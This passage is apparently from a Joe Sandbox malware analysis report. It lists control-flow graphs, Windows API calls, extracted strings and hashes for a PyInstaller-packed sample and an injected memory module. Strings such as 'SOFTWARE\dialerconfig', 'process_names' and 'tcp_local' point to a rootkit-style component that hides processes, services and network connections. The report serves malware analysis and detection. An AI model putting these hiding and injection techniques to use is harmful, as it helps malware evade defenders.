call 7ff7272681f0 call 7ff727267ec0 215->217 216->162 217->216 224 7ff727263a02-7ff727263a10 217->224 225 7ff727263a12-7ff727263a2c call 7ff7272625f0 call 7ff7272618a0 224->225 226 7ff727263a31-7ff727263a38 call 7ff727262870 224->226 225->162 226->216
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName
                                                                    • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                                    • API String ID: 514040917-1099759049
                                                                    • Opcode ID: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
                                                                    • Instruction ID: 57501bc4588f215dc036185e0e2d329f5cfa2f16bbc345d8a02f640617d07cd6
                                                                    • Opcode Fuzzy Hash: e23a9ccd942307691fa2c6e5801df207f454df66072e745eadd11f0fb1882333
                                                                    • Instruction Fuzzy Hash: 14F16421A0868291FA15F720DF552F9A2F1EF56740FC4803BDA2D83697EF2CE556CB60

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 358 1f91b322b2c-1f91b322b97 call 1f91b342ce0 360 1f91b322b9d-1f91b322ba5 358->360 361 1f91b322bab-1f91b322bb1 360->361 362 1f91b322ee0-1f91b322f03 360->362 361->362 363 1f91b322bb7-1f91b322bba 361->363 363->362 364 1f91b322bc0-1f91b322bc3 363->364 364->362 365 1f91b322bc9-1f91b322bd9 GetModuleHandleA 364->365 366 1f91b322bdb-1f91b322beb GetProcAddress 365->366 367 1f91b322bed 365->367 368 1f91b322bf0-1f91b322c0e 366->368 367->368 368->362 370 1f91b322c14-1f91b322c33 StrCmpNIW 368->370 370->362 371 1f91b322c39-1f91b322c3d 370->371 371->362 372 1f91b322c43-1f91b322c4d 371->372 372->362 373 1f91b322c53-1f91b322c5a 372->373 373->362 374 1f91b322c60-1f91b322c73 373->374 375 1f91b322c83 374->375 376 1f91b322c75-1f91b322c81 374->376 377 1f91b322c86-1f91b322c8a 375->377 376->377 378 1f91b322c8c-1f91b322c98 377->378 379 1f91b322c9a 377->379 380 1f91b322c9d-1f91b322ca7 378->380 379->380 381 1f91b322d9d-1f91b322da1 380->381 382 1f91b322cad-1f91b322cb0 380->382 383 1f91b322ed2-1f91b322eda 381->383 384 1f91b322da7-1f91b322daa 381->384 385 1f91b322cc2-1f91b322ccc 382->385 386 1f91b322cb2-1f91b322cbf call 1f91b32199c 382->386 383->362 383->374 389 1f91b322dbb-1f91b322dc5 384->389 390 1f91b322dac-1f91b322db8 call 1f91b32199c 384->390 387 1f91b322d00-1f91b322d0a 385->387 388 1f91b322cce-1f91b322cdb 385->388 386->385 393 1f91b322d0c-1f91b322d19 387->393 394 1f91b322d3a-1f91b322d3d 387->394 388->387 392 1f91b322cdd-1f91b322cea 388->392 396 1f91b322dc7-1f91b322dd4 389->396 397 1f91b322df5-1f91b322df8 389->397 390->389 401 1f91b322ced-1f91b322cf3 392->401 393->394 402 1f91b322d1b-1f91b322d28 393->402 403 1f91b322d4b-1f91b322d58 lstrlenW 394->403 404 1f91b322d3f-1f91b322d49 call 1f91b321bbc 394->404 396->397 406 1f91b322dd6-1f91b322de3 396->406 399 1f91b322dfa-1f91b322e03 call 1f91b321bbc 397->399 400 1f91b322e05-1f91b322e12 lstrlenW 397->400 399->400 425 1f91b322e4a-1f91b322e55 399->425 410 1f91b322e14-1f91b322e1e 400->410 411 1f91b322e35-1f91b322e3f call 1f91b323844 400->411 408 1f91b322cf9-1f91b322cfe 401->408 409 1f91b322d93-1f91b322d98 401->409 412 1f91b322d2b-1f91b322d31 402->412 414 1f91b322d7b-1f91b322d8d call 1f91b323844 403->414 415 1f91b322d5a-1f91b322d64 403->415 404->403 404->409 416 1f91b322de6-1f91b322dec 406->416 408->387 408->401 419 1f91b322e42-1f91b322e44 409->419 410->411 420 1f91b322e20-1f91b322e33 call 1f91b32152c 410->420 411->419 412->409 421 1f91b322d33-1f91b322d38 412->421 414->409 414->419 415->414 424 1f91b322d66-1f91b322d79 call 1f91b32152c 415->424 416->425 426 1f91b322dee-1f91b322df3 416->426 419->383 419->425 420->411 420->425 421->394 421->412 424->409 424->414 431 1f91b322ecc-1f91b322ed0 425->431 432 1f91b322e57-1f91b322e5b 425->432 426->397 426->416 431->383 435 1f91b322e5d-1f91b322e61 432->435 436 1f91b322e63-1f91b322e7d call 1f91b3285c0 432->436 435->436 437 1f91b322e80-1f91b322e83 435->437 436->437 440 1f91b322e85-1f91b322ea3 call 1f91b3285c0 437->440 441 1f91b322ea6-1f91b322ea9 437->441 440->441 441->431 443 1f91b322eab-1f91b322ec9 call 1f91b3285c0 441->443 443->431
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: 955a688418e53f94d4125852c0591c49552a3d69651ab15b1429fc901e9338e5
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: EEB19B3621AA5386EB65AF29DC407FD63A6FB44BE4F085076EE0953794DB34CC66C340

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 477 7ff727285c74-7ff727285ce7 call 7ff7272859a8 480 7ff727285ce9-7ff727285cf2 call 7ff7272743d4 477->480 481 7ff727285d01-7ff727285d0b call 7ff727277830 477->481 486 7ff727285cf5-7ff727285cfc call 7ff7272743f4 480->486 487 7ff727285d0d-7ff727285d24 call 7ff7272743d4 call 7ff7272743f4 481->487 488 7ff727285d26-7ff727285d8f CreateFileW 481->488 501 7ff727286042-7ff727286062 486->501 487->486 489 7ff727285e0c-7ff727285e17 GetFileType 488->489 490 7ff727285d91-7ff727285d97 488->490 496 7ff727285e6a-7ff727285e71 489->496 497 7ff727285e19-7ff727285e54 GetLastError call 7ff727274368 CloseHandle 489->497 493 7ff727285dd9-7ff727285e07 GetLastError call 7ff727274368 490->493 494 7ff727285d99-7ff727285d9d 490->494 493->486 494->493 499 7ff727285d9f-7ff727285dd7 CreateFileW 494->499 504 7ff727285e79-7ff727285e7c 496->504 505 7ff727285e73-7ff727285e77 496->505 497->486 512 7ff727285e5a-7ff727285e65 call 7ff7272743f4 497->512 499->489 499->493 506 7ff727285e82-7ff727285ed7 call 7ff727277748 504->506 507 7ff727285e7e 504->507 505->506 515 7ff727285ed9-7ff727285ee5 call 7ff727285bb0 506->515 516 7ff727285ef6-7ff727285f27 call 7ff727285728 506->516 507->506 512->486 515->516 522 7ff727285ee7 515->522 523 7ff727285f2d-7ff727285f6f 516->523 524 7ff727285f29-7ff727285f2b 516->524 525 7ff727285ee9-7ff727285ef1 call 7ff727279dd0 522->525 526 7ff727285f91-7ff727285f9c 523->526 527 7ff727285f71-7ff727285f75 523->527 524->525 525->501 529 7ff727285fa2-7ff727285fa6 526->529 530 7ff727286040 526->530 527->526 528 7ff727285f77-7ff727285f8c 527->528 528->526 529->530 532 7ff727285fac-7ff727285ff1 CloseHandle CreateFileW 529->532 530->501 534 7ff727286026-7ff72728603b 532->534 535 7ff727285ff3-7ff727286021 GetLastError call 7ff727274368 call 7ff727277970 532->535 534->530 535->534
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                    • String ID:
                                                                    • API String ID: 1617910340-0
                                                                    • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                    • Instruction ID: 14ba95b0fa468a596a0f02fba26591d8586861d9f7a678e6bfe00459f21ac5ea
                                                                    • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                    • Instruction Fuzzy Hash: DBC1F732B14A4185EB10DF69C9806AC77B6FB4AB98F411235DF2E9B795CF39D052C720

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267A1B
                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267A9E
                                                                    • DeleteFileW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ABD
                                                                    • FindNextFileW.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ACB
                                                                    • FindClose.KERNEL32(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267ADC
                                                                    • RemoveDirectoryW.KERNELBASE(?,00007FF727267EF9,00007FF7272639E6), ref: 00007FF727267AE5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                    • String ID: %s\*
                                                                    • API String ID: 1057558799-766152087
                                                                    • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                    • Instruction ID: a933dec0a08577a67d3d385325421bf26ae5501818e81c298f1d1cc86e907b02
                                                                    • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                    • Instruction Fuzzy Hash: 34417F21A0C54391EA20AF24EA445B9B3F1FB96754FC0823BD59D82794DF2CDA4B8F20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction ID: 612a08ef5e2e3ed63eabed1de08bed0ffc2fbbfe99e110f63716034b99f27894
                                                                    • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                    • Instruction Fuzzy Hash: E271C23A60D78345E724AE2A9C443FE6796F385BE4F480076DE0A53B8ADB35C6568B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                    • Instruction ID: 16e2f5ef20e6be11a7a24d371a06086d4cda91b64caaefc340c60fdcbc4507ca
                                                                    • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                    • Instruction Fuzzy Hash: BCF0C832A1868186F7A09B60BA49766B3E0EB45728F84533ED96D026D4DF3CD05A8F10
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                                    • String ID:
                                                                    • API String ID: 1010374628-0
                                                                    • Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                    • Instruction ID: 8af0db26e203514cb354bbeadd7d5bb5467233f1b2fdc86fae2dd32006072f55
                                                                    • Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                    • Instruction Fuzzy Hash: A202AA21A1D69341FA61FB159F01679A2E0EF47BA0FD44639DD6D8A2D2DF3DA4038B30
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                    • Instruction ID: b704aea69ed206028f508fc956f3ca6bb7186bf87d513bc83a78aeedea7779bd
                                                                    • Opcode Fuzzy Hash: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
                                                                    • Instruction Fuzzy Hash: 6721AC32319B478AE360AF16AC416AEB7A5F384FE0F594139DF9543758DF34D8628700

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: 57ba427159f3f3f58038dd4d423a5810de92c434595bdc8d0d2dd0d4eed70e8c
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: F771113A71AE1385EB10AF66E9917ED2366F784BA8F081131ED4D47B68DF38C466C740

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 232 7ff7272618f0-7ff72726192b call 7ff727263f70 235 7ff727261bc1-7ff727261be5 call 7ff72726b870 232->235 236 7ff727261931-7ff727261971 call 7ff7272676a0 232->236 241 7ff727261bae-7ff727261bb1 call 7ff72726f36c 236->241 242 7ff727261977-7ff727261987 call 7ff72726f9f4 236->242 245 7ff727261bb6-7ff727261bbe 241->245 247 7ff727261989-7ff72726199c call 7ff727262760 242->247 248 7ff7272619a1-7ff7272619bd call 7ff72726f6bc 242->248 245->235 247->241 253 7ff7272619d7-7ff7272619ec call 7ff727274154 248->253 254 7ff7272619bf-7ff7272619d2 call 7ff727262760 248->254 259 7ff7272619ee-7ff727261a01 call 7ff727262760 253->259 260 7ff727261a06-7ff727261a87 call 7ff727261bf0 * 2 call 7ff72726f9f4 253->260 254->241 259->241 268 7ff727261a8c-7ff727261a9f call 7ff727274170 260->268 271 7ff727261ab9-7ff727261ad2 call 7ff72726f6bc 268->271 272 7ff727261aa1-7ff727261ab4 call 7ff727262760 268->272 277 7ff727261aec-7ff727261b08 call 7ff72726f430 271->277 278 7ff727261ad4-7ff727261ae7 call 7ff727262760 271->278 272->241 283 7ff727261b1b-7ff727261b29 277->283 284 7ff727261b0a-7ff727261b16 call 7ff7272625f0 277->284 278->241 283->241 286 7ff727261b2f-7ff727261b3e 283->286 284->241 288 7ff727261b40-7ff727261b46 286->288 289 7ff727261b48-7ff727261b55 288->289 290 7ff727261b60-7ff727261b6f 288->290 291 7ff727261b71-7ff727261b7a 289->291 290->290 290->291 292 7ff727261b7c-7ff727261b7f 291->292 293 7ff727261b8f 291->293 292->293 295 7ff727261b81-7ff727261b84 292->295 294 7ff727261b91-7ff727261bac 293->294 294->241 294->288 295->293 296 7ff727261b86-7ff727261b89 295->296 296->293 297 7ff727261b8b-7ff727261b8d 296->297 297->294
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _fread_nolock$Message
                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                    • API String ID: 677216364-3497178890
                                                                    • Opcode ID: 1f01653437175558ce4e5f18922edd9f9e16046bcc5bf7555f9ed7af322dcba1
                                                                    • Instruction ID: 6934e41ca30283fc3c18497a4a23dbef5abe6d88ccc5527de1ff4fbb6eef4434
                                                                    • Opcode Fuzzy Hash: 1f01653437175558ce4e5f18922edd9f9e16046bcc5bf7555f9ed7af322dcba1
                                                                    • Instruction Fuzzy Hash: 2671B831E0869685EB60EB15DA502B9A3F0FF46784F94803AD94D87799EF3CF5468F20

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 298 7ff7272615c0-7ff7272615d1 299 7ff7272615f7-7ff727261611 call 7ff727263f70 298->299 300 7ff7272615d3-7ff7272615dc call 7ff727261050 298->300 305 7ff72726163b-7ff727261655 call 7ff727263f70 299->305 306 7ff727261613-7ff72726163a call 7ff727262760 299->306 307 7ff7272615ee-7ff7272615f6 300->307 308 7ff7272615de-7ff7272615e9 call 7ff7272625f0 300->308 314 7ff727261657-7ff72726166c call 7ff7272625f0 305->314 315 7ff727261671-7ff727261688 call 7ff72726f9f4 305->315 308->307 320 7ff7272617c5-7ff7272617c8 call 7ff72726f36c 314->320 321 7ff7272616ab-7ff7272616af 315->321 322 7ff72726168a-7ff7272616a6 call 7ff727262760 315->322 327 7ff7272617cd-7ff7272617df 320->327 324 7ff7272616c9-7ff7272616e9 call 7ff727274170 321->324 325 7ff7272616b1-7ff7272616bd call 7ff7272611f0 321->325 333 7ff7272617bd-7ff7272617c0 call 7ff72726f36c 322->333 334 7ff72726170c-7ff727261717 324->334 335 7ff7272616eb-7ff727261707 call 7ff727262760 324->335 331 7ff7272616c2-7ff7272616c4 325->331 331->333 333->320 338 7ff72726171d-7ff727261726 334->338 339 7ff7272617a6-7ff7272617ae call 7ff72727415c 334->339 343 7ff7272617b3-7ff7272617b8 335->343 342 7ff727261730-7ff727261752 call 7ff72726f6bc 338->342 339->343 347 7ff727261754-7ff72726176c call 7ff72726fdfc 342->347 348 7ff727261785-7ff72726178c 342->348 343->333 353 7ff72726176e-7ff727261771 347->353 354 7ff727261775-7ff727261783 347->354 349 7ff727261793-7ff72726179c call 7ff727262760 348->349 357 7ff7272617a1 349->357 353->342 356 7ff727261773 353->356 354->349 356->357 357->339
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                    • API String ID: 2030045667-1550345328
                                                                    • Opcode ID: 0d710443b794d06185ffae1c18c442138d4fea5446e06e267d268dde38ddea3a
                                                                    • Instruction ID: de59183aa67f0e00054de138d9f7f27bb5655f884d9061bb4c9501aa58a8c107
                                                                    • Opcode Fuzzy Hash: 0d710443b794d06185ffae1c18c442138d4fea5446e06e267d268dde38ddea3a
                                                                    • Instruction Fuzzy Hash: E7518C61E0865392EA11BB15AE005B9A3F0FF46794FC4813AED1C47696EF3CF5568B20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                    • String ID: CreateProcessW$Failed to create child process!
                                                                    • API String ID: 2895956056-699529898
                                                                    • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                    • Instruction ID: 51561d6a7b105bfa0afd7f5b4c5068db42b2a32861e8ff878aafdc766392f1bf
                                                                    • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                    • Instruction Fuzzy Hash: F0411231A1878281EA20AB24F9552AAB3F1FBCA360F904339E6AD477D5DF7CD1458F50

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                    • API String ID: 2030045667-2813020118
                                                                    • Opcode ID: b84370ad9c341a229adc785912d60ff625ee95c4118844547039d3285a533b53
                                                                    • Instruction ID: 4193cc692b538aa7e6d13c040d786124b3c918333f9b7012a8ed70fff47e4c19
                                                                    • Opcode Fuzzy Hash: b84370ad9c341a229adc785912d60ff625ee95c4118844547039d3285a533b53
                                                                    • Instruction Fuzzy Hash: D051CA22E0865281E660BB15AE403BAA2F1FB46794FD4813ADD4D477D5EF3CE543CB20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF72727E3BA,?,?,-00000018,00007FF72727A063,?,?,?,00007FF727279F5A,?,?,?,00007FF72727524E), ref: 00007FF72727E19C
